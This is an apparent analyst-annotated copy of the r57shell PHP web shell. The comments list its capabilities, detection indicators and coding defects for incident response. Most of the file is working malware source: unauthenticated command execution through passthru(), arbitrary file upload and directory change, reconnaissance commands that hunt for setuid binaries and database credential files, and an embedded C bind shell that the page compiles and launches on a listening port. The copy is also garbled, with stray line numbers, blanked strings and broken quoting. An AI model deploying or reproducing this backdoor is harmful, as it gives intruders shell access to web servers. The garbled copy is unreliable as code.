
<?php
/*
 * ANALYST NOTE - r57shell web shell (single-file PHP backdoor), paste dated 2007.
 *
 * This is attacker tooling, not an application component. It is annotated
 * here for detection / incident-response purposes only; no executable text
 * has been altered.
 *
 * Capabilities visible in this file:
 *   - arbitrary command execution: passthru() of the POSTed `cmd` field
 *   - working-directory change via the POSTed `dir` field (chdir())
 *   - file upload into `dir` via the `userfile` multipart field
 *   - canned reconnaissance commands (see $aliases below)
 *   - compile-and-launch of a password-gated bind shell, /tmp/bd
 *     (C source kept in $port_bind_bd_c; form defaults: port 11457, pass "r57")
 *
 * No authentication of any kind is performed anywhere in this file: anyone
 * who can reach the script can run commands as the web-server user.
 *
 * Indicators: the "r57shell" page banner, the strings "welcome to r57 shell",
 * "/tmp/bd.c", "/tmp/bd" and "ps -aux | grep bd", POST fields
 * cmd / dir / alias / bind / bind_pass / port / userfile, a
 * <textarea name=report> holding command output, and gcc or /tmp/bd
 * running as the web-server user.
 *
 * Transcription caveat: this copy does not parse as PHP. The $lang lookups
 * use a bareword `$language._textN`, the submit-button echo lines contain
 * adjacent string literals with no operator, and the double quotes inside
 * the $port_bind_bd_c string are unescaped. The distributed source
 * presumably quoted/escaped these differently; do not assume this exact copy
 * runs verbatim.
 */

/*
 * UI language selector.
 * $language='ru'  - Russian labels (the 'ru_*' strings below are blank in this
 *                   copy; the Cyrillic text appears to have been lost in
 *                   transcoding)
 * $language='eng' - English labels
 */

$language='eng';

/*
 * Localised UI strings, keyed "<lang>_<id>". Later lookups are written as
 * $lang[$language._textN], i.e. an undefined constant that older PHP treats
 * as the string "_textN" (with a notice) and PHP 8 rejects with an Error.
 */
$lang=array(
           'ru_text1' => ' ',
           'ru_text2' => ' ',
           'ru_text3' => ' ',
           'ru_text4' => ' ',
           'ru_text5' => ' ',
           'ru_text6' => ' ',
           'ru_text7' => '',
           'ru_text8' => ' ',
           'ru_butt1' => '',
           'ru_butt2' => '',
           'ru_text9' => ' /bin/bash',
           'ru_text10' => ' ',
           'ru_text11' => ' ',
           'ru_butt3' => '',
           
           'eng_text1' => 'Executed command',
           'eng_text2' => 'Execute command on server',
           'eng_text3' => '&nbsp;Run command',
           'eng_text4' => 'Work directory',
           'eng_text5' => 'Upload files on server',
           'eng_text6' => 'Local file',
           'eng_text7' => 'Aliases',
           'eng_text8' => 'Select alias',
           'eng_butt1' => 'Execute',
           'eng_butt2' => 'Upload',
           'eng_text9' => 'Bind port to /bin/bash',
           'eng_text10' => 'Port',
           'eng_text11' => 'Password for access',
           'eng_butt3' => 'Bind'
           );
  44.  
  45.  
  46.  
  47.  
  48.  
/*
 * Canned reconnaissance commands offered in the "Aliases" form. A submitted
 * alias name that exactly matches a key replaces the POSTed `cmd` with the
 * mapped command (see the alias handler further down). The first four are
 * classic post-exploitation searches: setuid binaries, setgid binaries,
 * config.inc.php files (typically phpMyAdmin database credentials) and
 * world-writable paths. The dashed separator entry maps to a plain ls -la.
 */
$aliases=array(
'find all suid files' => 'find / -type f -perm -04000 -ls',

'find all sgid files' => 'find / -type f -perm -02000 -ls',

'find config.inc.php files' => 'find / -type f -name config.inc.php',

'find writable directories and files' => 'find / -perm -2 -ls',
'----------------------------------------------------------------------------------------------------' => 'ls -la'
);
  59.  
/*
 * C source of the bind-shell backdoor, kept as a PHP string and written to
 * /tmp/bd.c by the "port bind" handler below. What the compiled binary does,
 * as written:
 *   - usage: bd <port> <password>; fewer than 3 argv entries -> usage() -> exit
 *   - fork()s; the child listens on INADDR_ANY:<port> while the parent returns
 *     at once, so the PHP exec() that launches it does not block
 *   - per connection: fds 0/1/2 are dup2()'d onto the socket, it writes
 *     "Password:" (10 bytes, i.e. including the terminating NUL), reads up to
 *     30 bytes, and on a match runs
 *         echo welcome to r57 shell && /bin/bash -i
 *     via system(); on mismatch it prints "Sorry" (which lands on the socket,
 *     since stderr was redirected) and closes the connection
 *
 * Defects in this source, noted for the analyst and intentionally left as-is:
 *   - socket() failure is tested with !sockfd, but socket() returns -1, not 0
 *   - bind()/listen()/accept() return values are never checked
 *   - buf is neither zeroed nor NUL-terminated after read(), so strlen()/
 *     strcmp() in chpass() can read past the data (past the buffer on a
 *     30-byte input)
 *   - chpass() returns only on a match; on mismatch it falls off the end with
 *     no return value (undefined behaviour), so the password gate is unreliable
 *   - fds 0-2 are never restored after dup2(), only the accepted socket is
 *     closed
 *   - no <unistd.h>/<stdlib.h>: fork/dup2/close/exit/atoi are implicitly
 *     declared, which 2007-era gcc accepts with warnings and recent gcc (14+)
 *     rejects by default
 *
 * Detection: gcc spawned by the web-server user, /tmp/bd.c and /tmp/bd on
 * disk, a listening socket owned by the web-server user on an unusual port
 * (form default 11457), and the "welcome to r57 shell" banner on the wire.
 * Note the unescaped double quotes inside this PHP string literal: as pasted
 * the string would terminate early, so this copy was altered in transit.
 */
$port_bind_bd_c="
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(argc < 3) usage(argv[0]);
if(fork() == 0) { //
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror("socket error");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,"Password:",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system("echo welcome to r57 shell && /bin/bash -i");
else
fprintf(stderr,"Sorry");
close(newfd);
}
}
}
int usage(char *progname)
{
fprintf(stderr,"USAGE:%s <port num> <password>\n",progname);
exit(0);
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}";
  114.  
?>
<!-- r57shell UI shell: grey/black table layout. The literal "r57shell" text
     in the header below is a convenient signature for content-based detection. -->
<html>
<head>
</head>
<body bgcolor="#e4e0d8">
<table width=100%cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc>
<!-- logo -->
<font face=Verdana size=2>&nbsp;&nbsp;
<font face=Webdings size=6><b>!</b></font><b>&nbsp;&nbsp;r57shell</b>
</font>
</td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>
<?
/* change dir */
/*
 * Working-directory switch: chdir() straight into the POSTed `dir` value, with
 * no validation of any kind. Note that this and every later PHP block use the
 * short open tag `<?`, which requires short_open_tag=On.
 */
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
/* display information */
/*
 * Host fingerprint banner: runs uname -a, id and pwd through exec() and prints
 * the last output line of each (exec() returns only that line) in red.
 */
echo "<font face=Verdana size=-2>";
echo "<font color=blue><b>uname -a :&nbsp;<br>id :&nbsp;<br>pwd :&nbsp;</b></font><br>";
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo "&nbsp;&nbsp;&nbsp; ".exec("uname -a")."<br>";
echo "&nbsp;&nbsp;&nbsp; ".exec("id")."<br>";
echo "&nbsp;&nbsp;&nbsp; ".exec("pwd")."";
echo "</b></font>";
echo "</font>";
?>
</td></tr></table>
<?
/* port bind */
/*
 * Bind-shell launcher. Fires when the hidden `bind` field equals "bd.c" and
 * both a port and a password were POSTed:
 *   1. appends ("ab+") the C source in $port_bind_bd_c to /tmp/bd.c. Append
 *      mode means a repeated submission leaves a second full copy of the
 *      source in the file (duplicate main/usage/chpass), which gcc rejects;
 *   2. compiles it with gcc to /tmp/bd;
 *   3. runs "/tmp/bd <port> <pass>" with the POST values interpolated raw
 *      (no escapeshellarg());
 *   4. overrides `cmd` with "ps -aux | grep bd" so the page shows whether the
 *      listener came up.
 * The gcc and launch results are discarded ($blah is never read), so failure
 * is only visible through that ps output.
 */
if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
{
 $w_file=fopen("/tmp/bd.c","ab+") or exit();
 fputs($w_file,$port_bind_bd_c);
 fclose($w_file);
 $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
 $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']."";
 $blah=exec($bind_string);
 $_POST['cmd']="ps -aux | grep bd";
}

/*
 * Alias resolution: an exact (loose ==) match on an $aliases key swaps that
 * key's command into `cmd`, overriding whatever the bind handler set.
 */
if (($_POST['alias']) AND ($_POST['alias']!==""))
 {
 foreach ($aliases as $alias_name=>$alias_cmd) {
                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
                                               }
 }

/*
 * File upload: copies the uploaded temp file to "<dir>/<client filename>",
 * with the destination name taken straight from the client. This relies on
 * the $HTTP_POST_FILES long array (removed in PHP 5.4) and on the bareword
 * keys tmp_name / name (undefined-constant notices in old PHP, an Error in
 * PHP 8), so on a modern interpreter this path does not function.
 */
if (($HTTP_POST_FILES["userfile"]!=="") AND ($HTTP_POST_FILES["userfile"]))
{
copy($HTTP_POST_FILES["userfile"][tmp_name],
            $_POST['dir']."/".$HTTP_POST_FILES["userfile"][name])
      or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font></td></tr></table>");
}
?>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc>
<?
/* command execute */
/*
 * Command execution - the core of the shell. An absent or empty `cmd`
 * defaults to "ls -la". The command is echoed back unescaped, then run with
 * passthru(), whose raw output streams directly into the <textarea
 * name=report>. passthru() returns nothing, so the "".passthru()."" wrapper
 * contributes only the (empty) concatenation. Nothing is escaped or validated.
 */
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la"; }
echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
echo "<b>";
echo "<div align=center><textarea name=report cols=122 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
?>
</td></tr></table>
<table width=100% heigth=0 cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text2]; ?> ::</div></b></font></td></tr>
<tr><td height=23>
<?
/* command execute form */
/*
 * "Execute command" form: a text field `cmd` plus a `dir` field pre-filled
 * with the current directory (exec("pwd") on first view, the previous POST
 * value afterwards). The value attributes are unquoted, so a directory
 * containing whitespace would truncate the field. The submit-button line is
 * not valid PHP as pasted (adjacent string literals with no operator); the
 * distributed source presumably escaped those inner quotes.
 */
echo "<form name=command method=post>";
echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;".$lang[$language._text3]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=cmd size=85>&nbsp;&nbsp;<br>";
echo "<b>&nbsp;".$lang[$language._text4]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
echo "&nbsp;&nbsp;<input type=submit name=submit value=" ".$lang[$language._butt1]." ">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text5]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/* file upload form */
/*
 * File upload form: multipart POST with the file in `userfile` and the
 * destination directory carried in a hidden `dir` field (pre-filled like the
 * command form). Handled by the $HTTP_POST_FILES copy() block earlier in the
 * file. Submit-button line has the same unescaped-quote issue as the other
 * forms in this copy.
 */
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text6]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=file name=userfile size=85>&nbsp;";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=" ".$lang[$language._butt2]." ">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text7]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/* aliases form */
/*
 * Aliases form: one <option> per $aliases key (the option text doubles as the
 * submitted value, since no value attribute is set), plus the usual hidden
 * `dir` field. The server side matches the submitted text against the keys
 * and substitutes the mapped command.
 */
echo "<form name=aliases method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text8]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<select name=alias>";
foreach ($aliases as $alias_name=>$alias_cmd)
 {
 echo "<option>$alias_name</option>";
 }
 echo "</select>";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "&nbsp;&nbsp;<input type=submit name=submit value=" ".$lang[$language._butt1]." ">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
  238.  
  239.  
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text9]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/*
 * Bind-shell form. The hidden field `bind=bd.c` is what triggers the
 * compile-and-launch handler; `port` and `bind_pass` default to 11457 and
 * "r57" in the HTML, so a host compromised with an unmodified copy of this
 * tool is likely to be listening on that port with that password - worth
 * checking first during incident response.
 */
echo "<form name=bind method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text10]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=port size=15 value=11457>&nbsp;";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text11]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=bind_pass size=15 value=r57>&nbsp;";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=hidden name=bind size=1 value=bd.c>";
echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=submit value=" ".$lang[$language._butt3]." ">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
  258.  
  259.  
  260.  
  261.  
  262. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
  263. <tr><td bgcolor=#cccccc>
  264.  
  265. </td></tr></table>
  266.